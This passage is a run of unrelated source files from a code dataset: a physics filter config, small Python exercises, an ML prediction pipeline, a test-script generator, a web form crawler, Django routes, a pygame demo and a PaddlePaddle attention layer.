cms.double(999999999)\n\t)\n\ntriangleCutMTTop15AndMTBJet = cms.EDFilter(\n\t\"TriangleCutFilter\",\n\tsrc1 = cms.InputTag(\"MTTop15\"),\n\tsrc2 = cms.InputTag(\"MT15BJet\"),\n\tsrc1Coeff = cms.double(1),\n\tsrc2Coeff = cms.double(2),\n\ttriangleMinCut = cms.double(1000),\n\ttriangleMaxCut = cms.double(999999999)\n\t)\n\ntriangleCutMTTop2Pt120AndMTBJet = cms.EDFilter(\n\t\"TriangleCutFilter\",\n\tsrc1 = cms.InputTag(\"MTTop2Pt120\"),\n\tsrc2 = cms.InputTag(\"MT2Pt120BJet\"),\n\tsrc1Coeff = cms.double(1),\n\tsrc2Coeff = cms.double(2),\n\ttriangleMinCut = cms.double(1000),\n\ttriangleMaxCut = cms.double(999999999)\n\t)\n\ntriangleCutMTTop2Pt150AndMTBJet = cms.EDFilter(\n\t\"TriangleCutFilter\",\n\tsrc1 = cms.InputTag(\"MTTop2Pt150\"),\n\tsrc2 = cms.InputTag(\"MT2Pt150BJet\"),\n\tsrc1Coeff = cms.double(1),\n\tsrc2Coeff = cms.double(2),\n\ttriangleMinCut = cms.double(1000),\n\ttriangleMaxCut = cms.double(999999999)\n\t)\n","repo_name":"crsilk/UserCode","sub_path":"HEPTopTagger/StopAnalysis/EventFilters/python/TriangleCutFilter_MTTopAndMTBJet_cfi.py","file_name":"TriangleCutFilter_MTTopAndMTBJet_cfi.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39618130249","text":"import csv\n\nstudentsList = []\nstudentIn = {'nombre' : 'Juan', 'edad' : 19, 'cursos': ['Basic'] }\nstudentsList.append(studentIn)\nstudentIn = {'nombre' : 'Marcos', 'edad' : 20, 'cursos': ['Turbo C','Pascal'] }\nstudentsList.append(studentIn)\n\nfor student in studentsList:\n print(\"Nombre: \" + student[\"nombre\"])\n print(\"Edad: \" + str(student[\"edad\"]))\n print(\"Cursos: \")\n for curso in student[\"cursos\"]:\n print(\" \" + curso)\n\n\nwith open(\"outputFile.csv\", \"wb\") as f:\n w = csv.DictWriter(f, studentsList[0].keys())\n w.writeheader()\n for student in studentsList:\n w.writerow(student)\n\n","repo_name":"jpruiz84/ubicuas_unicauca","sub_path":"ejercicios/guia02a.py","file_name":"guia02a.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24246380805","text":"import numpy as np\nimport numpy as np\nimport pandas as pd\n\nfrom .model import ModelWrapper\nfrom .encoder import Encoder\nfrom backend.utils.load_yml import load_config\n\n\nclass PredictionPipeline(object):\n \"\"\"Controls the prediction process from creating embeds to generating the\n damage grades.\n\n Workflow:\n 1. Preprocess df for Encoder\n 2. Run Encoder and replace the df with new embeds\n 3. Preprocess df with embeds\n 4. Feed df converted to npy array to model\n 5. post process predictions\n \"\"\"\n\n def __init__(\n self,\n encoder_path: str,\n one_hot_cols: str,\n one_hot_geo_path: str,\n model_type: str,\n model_path: str = None,\n ) -> None:\n self.model: ModelWrapper = ModelWrapper(model_type, model_path)\n self.encoder: Encoder = Encoder(encoder_path, one_hot_cols, one_hot_geo_path)\n\n def predict(self, df: pd.DataFrame) -> np.ndarray:\n \"\"\"Runs the full prediction pipeline with a batch size of 1\"\"\"\n new_df: pd.DataFrame = self.encoder.replace_with_new_embeds(df, batch_size=1)\n data: np.ndarray = preprocess_embeds_df(new_df)\n if data.shape[1] != self.model.num_features():\n raise ValueError(\n f\"data not correct shape. 
 Is {data.shape}, but should be \"\n + f\"{(data.shape[0], self.model.num_features())}\"\n )\n\n y_pred = self.model.predict(data, False)\n return y_pred\n\n\ndef preprocess_embeds_df(df: pd.DataFrame) -> np.ndarray:\n \"\"\"Assumes that df already contains the embeds. Processes the df and\n converts it to a numpy array to be used in self.predict.\n \"\"\"\n if \"building_id\" in df.columns:\n df = df.drop([\"building_id\"], axis=1)\n\n if \"Unnamed: 0\" in df.columns:\n df = df.drop([\"Unnamed: 0\"], axis=1)\n\n return np.array(df)\n\n\ndef initialize_pipeline(config_path: str, model_type: str) -> PredictionPipeline:\n \"\"\"Initializes a prediction pipeline\n\n Args:\n model_type: One of 'catboost' or 'lightgbm'\n \"\"\"\n if model_type.lower() == \"catboost\":\n key = \"prediction_cat\"\n elif model_type.lower() == \"lightgbm\":\n key = \"prediction_lgb\"\n else:\n raise ValueError(f\"model_type must be 'catboost' or 'lightgbm', got {model_type}\")\n cfg = load_config(config_path)[key]\n return PredictionPipeline(**cfg)\n","repo_name":"jchen42703/plagiarism-api","sub_path":"backend/backend/api/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30674907686","text":"import argparse\n\n'''\nGet the command line parameters and return them.\nParameter list:\n--inputs_dir directory holding the test cases\n--inputs_type type of the test cases (file [file] or argument [args] type)\n--true_root_dir root directory of the correct program\n--true_source_path path to the correct source code\n--timeout threshold for judging a program run as timed out and killing it\n--version code version\n'''\ndef parserCommad():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--inputs_dir', action='store',\n default='./test_data/inputs/',\n dest='inputs_dir',\n help='test cases directory.')\n\n parser.add_argument('--inputs_type', action='store',\n default=\"file\",\n dest='inputs_type',\n help=\"test cases type. 
[file] or [args]\")\n\n parser.add_argument('--true_root_dir', action='store',\n default=\"./test_data/true_root/\",\n dest='true_root_dir',\n help='True example root dictionary.')\n\n parser.add_argument('--true_source_path', action='store',\n default=\"./test_data/true_root/source/tot_info.c\",\n dest='true_source_path',\n help='True program path.')\n\n parser.add_argument('--timeout', action='store',\n dest='timeout',\n type=int,\n default=1,\n help=\"run time limit of every program.\")\n\n parser.add_argument('--version', action='version',\n version='%(prog)s 1.2')\n\n results = parser.parse_args()\n\n return results\n\n\ndef createRunTrueSourceScriptFileMode(true_root_dir, true_source_path, timeout, inputs_dir):\n f = open(\"./output/input_list.txt\", 'r')\n input_paths = f.read().split(\"\\n\")[:-1]\n f.close()\n\n f = open(true_root_dir + \"run.sh\", \"w\")\n f.writelines(\"mkdir \" + true_root_dir + \"outputs\\n\")\n\n gcc_command = 'gcc ' + true_source_path + ' -o ' + true_source_path + '.exe -lm\\n'\n f.writelines(gcc_command)\n\n for i in range(len(input_paths)):\n command = 'echo \">>>>>>>>running test ' + str(i + 1) + '\"\\n'\n f.writelines(command)\n command = \"timeout \" + str(timeout) + \" \" \\\n + true_source_path + \".exe < \" \\\n + inputs_dir + input_paths[i] + \" > \" \\\n + true_root_dir + \"outputs/\" + input_paths[i] + \".out\\n\"\n f.writelines(command)\n\n f.close()\n\n\n'''\n读取output下的inputs_list文件(测试用例文件名列表),从所有测试用例文件中读出内容,续到运行正确源代码的run.sh脚本中\n'''\ndef createRunTrueSourceScriptArgsMode(true_root_dir, true_source_path, timeout, inputs_dir):\n\n # 获取测试用例文件列表\n f = open(\"./output/input_list.txt\", 'r')\n input_paths = f.read().split(\"\\n\")[:-1]\n f.close()\n\n # 打开所有测试用例文件,读取文件内的参数\n list_input_args = []\n for i in range(len(input_paths)):\n f = open(inputs_dir + input_paths[i], 'r')\n input_args = f.read()\n list_input_args.append(input_args)\n f.close()\n\n # 生成运行正确源代码的run.sh脚本\n f = open(true_root_dir+\"run.sh\", \"w\")\n f.writelines(\"mkdir \" + true_root_dir + \"outputs\\n\")\n\n gcc_command = 'gcc '+ true_source_path +' -o '+ true_source_path +'.exe -lm\\n'\n f.writelines(gcc_command)\n\n for i in range(len(list_input_args)):\n command = 'echo \">>>>>>>>running test ' + str(i+1) + '\"\\n'\n f.writelines(command)\n command = \"timeout \" + str(timeout) + \" \" \\\n + true_source_path +\".exe \" \\\n + list_input_args[i] +\" > \"\\\n + true_root_dir + \"outputs/\" + input_paths[i]+\".out\\n\"\n f.writelines(command)\n\n f.close()\n\n\nif __name__ == \"__main__\":\n args = parserCommad()\n\n if args.inputs_type == \"file\": # 文件模式\n createRunTrueSourceScriptFileMode(args.true_root_dir, args.true_source_path, args.timeout, args.inputs_dir)\n elif args.inputs_type == \"args\": # 参数模式\n createRunTrueSourceScriptArgsMode(args.true_root_dir, args.true_source_path, args.timeout, args.inputs_dir)\n else: # inputs_type异常\n raise Exception(\"!!!!!!-----inputs_type参数输入异常-------\")\n","repo_name":"lucyVan/SGS","sub_path":"HMBFL/HMBFLtool/create_run_true_source_shell.py","file_name":"create_run_true_source_shell.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30708078081","text":"import numpy as np\nimport pandas as pd\nimport streamlit as st \nfrom scipy.spatial.transform import Rotation as R\nimport shutil\nimport os\nimport base64\n\n@st.cache(suppress_st_warning=True, show_spinner=False, allow_output_mutation=True)\ndef read_file(name_of_file):\n\n# 
ENG_L_CS_rotM = rotx(-15.18); % 100% OK \n# ENG_R_CS_rotM = rotx(+15.28); % 100% OK \n# ENG_RR_CS_rotM = rotz(-90); % 100% OK\n# FS_L_CS_rotM = rotz(0); % 100% OK --> corrected\n# FS_R_CS_rotM = rotz(180); % 100% OK\n# FS_L_SS_rotM = rotx(16.91)*rotx(-90)*rotz(90); % 100% OK \n# FS_R_SS_rotM = rotx(-20.3)*rotx(-90)*rotz(90); % 100% OK \n# RS_L_CS_rotM = rotz(0); % 100% OK\n# RS_R_CS_rotM = rotz(180); % 100% OK\n# RS_L_SS_rotM = [0 -1 0 ; -1 0 0 ; 0 0 -1]; % 100% OK\n# RS_R_SS_rotM = rotx(9.17)*rotx(-90)*rotz(90); % 100% OK \n# ENG_L_SS_rotM = roty(12.43)*rotz(15.18)*roty(90); % 100% OK \n# ENG_R_SS_rotM = roty(28.7)*rotx(-11.42)*rotz(-90); % 100% OK \n# ENG_RR_SS_rotM = rotz(0); % 100% OK\n\n rot_dict = {'ENG_L_CS':R.from_euler('x', -15.18, degrees=True).as_matrix(),\n 'ENG_R_CS':R.from_euler('x', 15.28, degrees=True).as_matrix(),\n 'ENG_RR_CS':R.from_euler('z', -90, degrees=True).as_matrix(),\n 'FS_L_CS':R.from_euler('z', 0, degrees=True).as_matrix(),\n 'FS_R_CS':R.from_euler('z', 180, degrees=True).as_matrix(),\n 'FS_L_SS':R.from_euler('zx', [90,-90+16.91], degrees=True).as_matrix(),\n 'FS_R_SS':R.from_euler('zx', [90,-90-20.3], degrees=True).as_matrix(),\n 'RS_L_CS':R.from_euler('z', 0, degrees=True).as_matrix(),\n 'RS_R_CS':R.from_euler('z', 180, degrees=True).as_matrix(),\n 'RS_L_SS':np.array([[0,-1,0],[-1, 0, 0],[0,0,-1]]),\n 'RS_R_SS':R.from_euler('zx', [90,-90+9.17], degrees=True).as_matrix(),\n 'ENG_L_SS':R.from_euler('yzy', [90,15.18,12.43], degrees=True).as_matrix(),\n 'ENG_R_SS':R.from_euler('zxy', [-90,-11.42,28.7], degrees=True).as_matrix(),\n 'ENG_RR_SS':R.from_euler('z', 0, degrees=True).as_matrix() \n }\n # FS_L_CS_X/Z and ENG_RR_SS_X/Z --> suspicious ones, possibly swapped\n df = pd.read_csv('../Data/'+name_of_file+'.csv',sep='\\t')\n df.dropna(axis=1,how='any',inplace=True) \n\n temp = df['FS_L_CS_X']\n df['FS_L_CS_X'] = df['FS_L_CS_Z']\n df['FS_L_CS_Z'] = temp\n\n temp = df['ENG_RR_SS_X']\n df['ENG_RR_SS_X'] = df['ENG_RR_SS_Z']\n df['ENG_RR_SS_Z'] = temp\n\n # for sensor_name in rot_dict.keys():\n # col_to_accum = []\n # for col in np.sort(df_all_new.columns[2:]): \n # if sensor_name in col:\n # col_to_accum.append(col)\n\n # df_all_new[col_to_accum] = (np.dot(rot_dict[sensor_name],(np.array(df_all_new[col_to_accum])).T)).T\n\n for sensor_name in rot_dict.keys():\n # if sensor_name in list(df.columns):\n col_to_accum = []\n for col in np.sort(df.columns[2:]): \n if sensor_name in col:\n col_to_accum.append(col)\n \n if col_to_accum:\n df[col_to_accum] = (np.dot(rot_dict[sensor_name],(np.array(df[col_to_accum])).T)).T \n\n for col in df.columns[2:]:\n col_mean = np.nanmean(df[col])\n if 'CS' in col:\n scaling_factor = 0.3\n else:\n if 'ENG' in col:\n scaling_factor = 0.02\n else:\n scaling_factor = 0.057\n \n df[col] = (df[col]-col_mean)/scaling_factor\n \n # tmpdirname_plots = 'csv_file'\n # tmpdirname_zip = 'archive_csv'\n # try:\n # shutil.rmtree(tmpdirname_plots)\n # shutil.rmtree(tmpdirname_zip)\n # except:\n # pass \n # os.makedirs(tmpdirname_plots,exist_ok=True) \n # os.makedirs(tmpdirname_zip,exist_ok=True) \n\n # df.to_csv(tmpdirname_plots + '/' + name_of_file + '.csv')\n # create_download_zip(tmpdirname_plots,tmpdirname_zip,name_of_file + '_csvfile')\n\n return df\n\ndef create_download_zip(zip_directory, zip_path, filename=\"foo.zip\"):\n \"\"\" \n zip_directory (str): path to directory you want to zip \n zip_path (str): where you want to save zip file\n filename (str): download filename for user who download this\n \"\"\"\n 
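# Usage sketch (illustrative only; the directory names and filename are hypothetical):\n #\n # create_download_zip('csv_file', 'archive_csv', 'results')\n #\n # This packs csv_file/ into archive_csv/results.zip and renders a base64-encoded\n # download link in the Streamlit app, exactly as the statements below do.\n 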
shutil.make_archive(os.path.join(zip_path,filename), 'zip', zip_directory)\n with open(os.path.join(zip_path,filename+'.zip'), 'rb') as f:\n bytes = f.read()\n b64 = base64.b64encode(bytes).decode()\n href = f'<a href=\"data:file/zip;base64,{b64}\" download=\\'{filename}.zip\\'>\\\n Click here to download \\\n </a>'\n st.markdown(href, unsafe_allow_html=True)\n","repo_name":"shoebNTU/freq_analysis","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9906937542","text":"import requests, urlparse, json, lxml\nfrom bs4 import BeautifulSoup\n\nclass Crawler(object):\n\tdef __init__(self, headers={}, cookies={}):\n\t\tself.session = requests.session()\n\n\t\theaders.update({\n\t\t\t'user-agent': 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36'\n\t\t})\n\n\t\tself.session.headers.update(headers)\n\t\tself.add_to_cookies(cookies)\n\n\tdef visit(self, url):\n\t\treturn self._get(url)\n\n\tdef submit(self, form, data={}, headers={}, method=None):\n\t\tdata = self._merge(form.data, data)\n\n\t\tif method == 'get' or form.type == 'get':\n\t\t\treturn self._get(form.url, data, headers)\n\t\telse:\n\t\t\treturn self._post(form.url, data, headers)\n\n\tdef get_forms(self, url):\n\t\tresponse = self._get(url)\n\n\t\t# update the url in case we were redirected\n\t\t# example: http://github.com/login redirects to https://github.com/login\n\t\turl = response.url\n\n\t\thtml = BeautifulSoup(response.text, 'lxml')\n\t\tforms = []\n\t\tfor form in html.find_all('form'):\n\t\t\tinputs = []\n\t\t\tfor _input in form.find_all('input'):\n\t\t\t\tinputs.append({\n\t\t\t\t\t'name': _input['name'] if 'name' in _input.attrs else '',\n\t\t\t\t\t'value': _input['value'] if 'value' in _input.attrs else '',\n\t\t\t\t\t'type': _input['type'] if 'type' in _input.attrs else ''\n\t\t\t\t})\n\n\t\t\tmethod = form['method'].lower() if 'method' in form.attrs else 'get'\n\t\t\tforms.append(CrawlerForm(url, form['action'], inputs, method))\n\n\t\treturn forms\n\n\t# return dictionary of cookies\n\tdef get_cookies(self):\n\t\treturn requests.utils.dict_from_cookiejar(self.session.cookies)\n\n\t# dictionary to add/overwrite cookies\n\tdef add_to_cookies(self, cookie):\n\t\tself.session.cookies = requests.utils.cookiejar_from_dict(self._merge(self.get_cookies(), cookie))\n\n\t# return dictionary of headers\n\tdef get_headers(self):\n\t\treturn dict(self.session.headers)\n\n\t# dictionary to add/overwrite headers\n\tdef add_to_headers(self, header):\n\t\tself.session.headers = self._merge(self.session.headers, header)\n\n\tdef _request(self, method, url, params={}, headers={}, cookies={}):\n\t\theaders = self._merge(self.session.headers, headers)\n\n\t\tcookies = self._merge(self.get_cookies(), cookies)\n\t\tif method == 'get':\n\t\t\treturn self.session.request(method.upper(), url, params=params, headers=headers, cookies=cookies)\n\t\telse:\n\t\t\treturn self.session.request(method.upper(), url, data=params, headers=headers, cookies=cookies)\n\n\tdef _get(self, url, *arg):\n\t\treturn self._request('get', url, *arg)\n\n\tdef _post(self, url, *arg):\n\t\treturn self._request('post', url, *arg)\n\n\tdef _merge(self, dict1, dict2):\n\t\treturn dict(dict1.items() + dict2.items())\n\nclass CrawlerForm(object):\n\tdef __init__(self, url, action, inputs, type):\n\t\tself.url = urlparse.urljoin(url, action)\n\t\tself.data = 
{}\n\n\t\tfor _input in inputs:\n\t\t\tif _input['name'] != '':\n\t\t\t\tself.data[_input['name']] = _input['value']\n\n\t\tif type != 'get' and type != 'post':\n\t\t\traise Exception('Form type invalid: \\'%s\\'' % type)\n\n\t\tself.type = type\n\n\tdef __str__(self):\n\t\treturn json.dumps({\n\t\t\t'url': self.url,\n\t\t\t'data': self.data,\n\t\t\t'type': self.type\n\t\t})","repo_name":"sathoro/python-crawler","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"71126955987","text":"from typing import List\n\n\nclass Solution:\n def fixedPoint(self, arr: List[int]) -> int:\n l, r, res = 0, len(arr)-1, -1\n while l <= r:\n m = (l+r) // 2\n if arr[m] == m: res, r = m, m-1\n elif arr[m] < m: l = m+1\n else: r = m-1\n return res\n \n ","repo_name":"cedricwangyu/LC","sub_path":"1064-Fixed_Point.py","file_name":"1064-Fixed_Point.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"3000042497","text":"from django.urls import path\nfrom .views import TipoDocumentoListAPIView, TipoDocumentoDetailAPIView, TipoContribuyenteListAPIView, \\\n EntidadListAPIView, EntidadDetailAPIView, TipoContribuyenteDetailAPIView\n\nurlpatterns = [\n path('tipo-documentos/', TipoDocumentoListAPIView.as_view(), # list, create\n name='tipo-documentos'),\n\n path('tipo-documento/<int:pk>/', TipoDocumentoDetailAPIView.as_view(), # detail: update and delete,\n name='tipo-documento'),\n\n path('tipo-contribuyentes/', TipoContribuyenteListAPIView.as_view(),\n name='tipo-contribuyentes'),\n\n path('tipo-contribuyente/<int:pk>/', TipoContribuyenteDetailAPIView.as_view(),\n name='tipo-contribuyente'),\n\n path('entidades/', EntidadListAPIView.as_view(),\n name='entidades'),\n\n path('entidad/<int:pk>/', EntidadDetailAPIView.as_view(),\n name='entidad'),\n]\n","repo_name":"Yhonniel/entidades-backend","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37760569505","text":"N = int(input())\nnum = list(map(int, input().split()))\nMin = min(num)\n\nfor i in range(len(num)) :\n num[i] += abs(Min)\n\nnewNum = set(num)\nnewNum = list(newNum)\n\nnewNum.sort()\n\n# store the result values via a dictionary\ndic = {}\nfor i in range(len(newNum)) :\n dic[i] = newNum[i]\n\nreverse_dic = dict(map(reversed, dic.items()))\n\nfor i in range(N) :\n print(reverse_dic[num[i]], end=' ')\n","repo_name":"KangGeonyoung/Algorithm","sub_path":"Baekjoon/12. 
정렬/18870.py","file_name":"18870.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26577010174","text":"import csv\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import ndimage\nimport tensorflow as tf\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom keras.models import Sequential\nfrom keras.layers import Cropping2D, Lambda\nfrom keras.layers.core import Dense, Flatten, Dropout\nfrom keras.layers.convolutional import Conv2D\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\nimage_width = 320\nimage_height = 160\n\ndef process_CSV(directory_list):\n \"\"\"\n Read the CSV file and return a list of the lines\n (Also remove the last empty line in the CSV)\n \"\"\"\n lines = []\n for dir_name in directory_list:\n filename = dir_name + 'driving_log.csv'\n with open(filename) as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n lines.append(line)\n lines.pop() # remove the empty line \n return lines\n\n\ndef augment_flip(image, steering_angle):\n \"\"\"\n Flip the image and steering_angle and return them\n \"\"\"\n # Flip along the width axis; this handles both a single image and a stacked\n # batch of images (np.fliplr on a stacked batch would flip height instead)\n image_flipped = np.flip(image, axis=-2)\n steering_angle_flipped = np.multiply(-1.0,steering_angle)\n return image_flipped, steering_angle_flipped\n\n\ndef process_line(line):\n \"\"\"\n Process a line from driving_log CSV. Return the center, left, \n and right images and corresponding steering angles, as well as\n the flipped version of these data\n \"\"\"\n # Steering angle adjustment for left and right images\n correction = 0.2\n # Get the images from the line\n images = []\n for i in range(3):\n image = ndimage.imread(line[i])\n images.append(image)\n # Generate steering_angles for each image\n steering_angle = float(line[3])\n steering_angles = [steering_angle, steering_angle+correction, steering_angle-correction]\n # Augment the data\n images_flipped, steering_angles_flipped = augment_flip(images,steering_angles)\n images.extend(images_flipped)\n steering_angles.extend(steering_angles_flipped)\n return images, steering_angles\n \n\ndef generator(samples, batch_size=32):\n \"\"\"\n Generate images and steering angles from CSV lines in batches\n \"\"\"\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n shuffle(samples)\n # Batching\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n # Process a batch of data\n images = []\n angles = []\n for batch_sample in batch_samples:\n batch_images, batch_angles = process_line(batch_sample)\n images.extend(batch_images)\n angles.extend(batch_angles)\n\n # Convert to numpy array\n X_train = np.array(images)\n y_train = np.array(angles)\n yield shuffle(X_train, y_train)\n \n# Read CSV\nCSV_directories = ['./my_data/', './track1_reverse/', './track2/', './track2_reverse/']\nlines = process_CSV(CSV_directories)\n# For the first dataset, I started at a turn but didn't start driving \n# until sometime after pressing the 'record' button, so I am removing\n# these data which have 0 steering angle at a turn.\ngood_lines = lines[14:]\ntrain_samples, validation_samples = train_test_split(good_lines, test_size=0.2)\n\n# Model\nmodel = Sequential()\nmodel.add(Cropping2D(cropping=((64,32), (0,0)), input_shape=(160,320,3))) # Crop to the road\nmodel.add(Lambda(lambda x: (x / 255.0) - 0.5)) # Normalize\nmodel.add(Conv2D(24, (5,5), strides=(2,2), 
activation='relu'))\nmodel.add(Conv2D(36, (5,5), strides=(2,2), activation='relu'))\nmodel.add(Conv2D(48, (5,5), strides=(2,2), activation='relu'))\nmodel.add(Conv2D(64, (3,3), activation='relu'))\nmodel.add(Conv2D(64, (3,3), activation='relu'))\nmodel.add(Flatten())\nmodel.add(Dropout(rate=0.5))\nmodel.add(Dense(100))\nmodel.add(Dropout(rate=0.5))\nmodel.add(Dense(50))\nmodel.add(Dropout(rate=0.5))\nmodel.add(Dense(10))\nmodel.add(Dropout(rate=0.5))\nmodel.add(Dense(1))\n\n# Training Setup\nepoch = 50\nbatch_size=32\nfilename = 'model'\n# Data\ntrain_generator = generator(train_samples, batch_size=batch_size)\nvalidation_generator = generator(validation_samples, batch_size=batch_size)\n# Callbacks\ncheckpoint = ModelCheckpoint(filepath=(filename+'.h5'), monitor='val_loss', save_best_only=True)\nstopper = EarlyStopping(monitor='val_loss', min_delta=0.01, patience=5)\n# Training\nmodel.compile(loss='mse', optimizer='adam')\nhistory_object = model.fit_generator(train_generator, \\\n steps_per_epoch=np.ceil(len(train_samples)/batch_size), \\\n validation_data=validation_generator, \\\n validation_steps=np.ceil(len(validation_samples)/batch_size), \\\n epochs=epoch, callbacks = [checkpoint, stopper])\n# Save history\nwith open(filename+'.p', 'wb') as file_pi:\n pickle.dump(history_object.history, file_pi)\n \n \n \n# # Other stuff I've tried \n#model.fit(X_train, y_train, validation_split=0.5, shuffle=True, epochs=epoch, callbacks=[checkpoint, stopper]) # loss: 0.05, vac_los: 0.4?\n#model.fit(X_train, y_train, validation_split=0.2, shuffle=True, epochs=epoch, callbacks=[checkpoint, stopper]) # loss: 0.05+, vac_loss: 0.11\n# # Without callbacks\n# epoch = 5\n# model.fit(X_train, y_train, validation_split=0.2, shuffle=True, epochs=epoch) \n# model.save('model_overfit.h5') # loss: 0.037, vac_loss: 0.12\n# model.fit(X_train, y_train, validation_split=0.2, shuffle=True, epochs=epoch)\n# model.save('model_overfit2.h5') # - loss: 0.0339 - val_loss: 0.1243\n# model.fit(X_train, y_train, shuffle=True, epochs=epoch)\n# model.save('model_superoverfit.h5') # loss: 0.04","repo_name":"GuanyangLuo/CarND-End_to_End_Learning","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"18383216309","text":"import pygame\nimport sys\n\nblack = (0, 0, 0)\nred = (255, 0, 0)\nwhite = (255, 255, 255)\npygame.init()\nscr = pygame.display.set_mode((600, 600))\nwin = scr.get_rect()\n\nbox = pygame.Rect(0, 0, 50, 50)\nbox.center = win.center\n\nvec = [3, 5]\nvec2 = [1, 2]\nfps = pygame.time.Clock()\n\nmyfont = pygame.font.Font('freesansbold.ttf', 48)\nmsg = myfont.render(\"The Game !!!\", True, red)\n\nmsg_box = msg.get_rect()\nmsg_box.center = win.center\n\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n msg_box = msg_box.move(vec2)\n if msg_box.left < win.left or msg_box.right > win.right:\n vec2[0] = -vec2[0]\n if msg_box.bottom > win.bottom or msg_box.top < win.top:\n vec2[1] = -vec2[1]\n box = box.move(vec)\n if box.left < win.left or box.right > win.right:\n vec[0] = -vec[0]\n if box.bottom > win.bottom or box.top < win.top:\n vec[1] = -vec[1]\n\n scr.fill(black)\n pygame.draw.rect(scr, white, box)\n scr.blit(msg, msg_box)\n\n pygame.display.flip()\n\n 
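# Cap the main loop at roughly 100 frames per second so the box and the text move at a steady speed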
fps.tick(100)\n","repo_name":"MichalZelazko/Scripting-Languages-2021-22","sub_path":"pygame6.py","file_name":"pygame6.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21931234917","text":"import paddle\nfrom paddle import tensor\nfrom paddle.fluid import layers\nimport paddle.nn.functional as F\nfrom paddle.nn import Layer, Linear\nfrom paddle.fluid.data_feeder import convert_dtype\n\n__all__ = ['QuickGELU', 'AttentionPool2D']\n\n\nclass QuickGELU(Layer):\n \"\"\" GELU \"\"\"\n def forward(self, x):\n return x * F.sigmoid(1.702 * x)\n\n\nclass AttentionPool2D(Layer):\n def __init__(self, spacial_dim, embed_dim, num_heads, output_dim,\n dropout=0,\n need_weights=False,\n weight_attr=None,\n bias_attr=None):\n super(AttentionPool2D, self).__init__()\n self.positional_embedding = paddle.randn((spacial_dim ** 2 + 1, embed_dim)) / embed_dim ** 0.5\n self.embed_dim = embed_dim\n self.num_heads = num_heads\n self.dropout = dropout\n self.need_weights = need_weights\n\n self.head_dim = embed_dim // num_heads\n assert self.head_dim * num_heads == self.embed_dim, \"embed_dim must be divisible by num_heads\"\n self.in_features = embed_dim\n self.q_proj = Linear(\n embed_dim, embed_dim, weight_attr, bias_attr=bias_attr)\n self.k_proj = Linear(\n embed_dim, embed_dim, weight_attr, bias_attr=bias_attr)\n self.v_proj = Linear(\n embed_dim, embed_dim, weight_attr, bias_attr=bias_attr)\n self.out_proj = Linear(\n embed_dim, output_dim or embed_dim, weight_attr, bias_attr=bias_attr)\n\n def _prepare_qkv(self, query, key, value):\n q = self.q_proj(query)\n q = tensor.reshape(x=q, shape=[0, 0, self.num_heads, self.head_dim])\n q = tensor.transpose(x=q, perm=[0, 2, 1, 3])\n k, v = self.compute_kv(key, value)\n return (q, k, v)\n\n def compute_kv(self, key, value):\n k = self.k_proj(key)\n v = self.v_proj(value)\n k = tensor.reshape(x=k, shape=[0, 0, self.num_heads, self.head_dim])\n k = tensor.transpose(x=k, perm=[0, 2, 1, 3])\n v = tensor.reshape(x=v, shape=[0, 0, self.num_heads, self.head_dim])\n v = tensor.transpose(x=v, perm=[0, 2, 1, 3])\n return k, v\n\n\n def forward(self, x):\n x = x.reshape((x.shape[0], x.shape[1], x.shape[2] * x.shape[3])).transpose((2, 0, 1)) # NCHW -> (HW)NC\n x = paddle.concat([x.mean(axis=0, keepdim=True), x], axis=0) # (HW+1)NC\n x = x + self.positional_embedding.unsqueeze(axis=1).astype(x.dtype) # (HW+1)NC\n x = self.multi_head_attention_forward(\n query=x, key=x, value=x,\n )\n return x[0]\n\n\n\n def multi_head_attention_forward(self,\n query, key=None, value=None,\n attn_mask=None, cache=None):\n key = query if key is None else key\n value = query if value is None else value\n # compute q ,k ,v\n q, k, v = self._prepare_qkv(query, key, value)\n\n # scale dot product attention\n # TODO(guosheng): use tensor.matmul, however it doesn't support `alpha`\n product = layers.matmul(\n x=q, y=k, transpose_y=True, alpha=self.head_dim**-0.5)\n if attn_mask is not None:\n # Support bool or int mask\n attn_mask = _convert_attention_mask(attn_mask, product.dtype)\n product = product + attn_mask\n weights = F.softmax(product)\n if self.dropout:\n weights = F.dropout(\n weights,\n self.dropout,\n training=self.training,\n mode=\"upscale_in_train\")\n\n out = 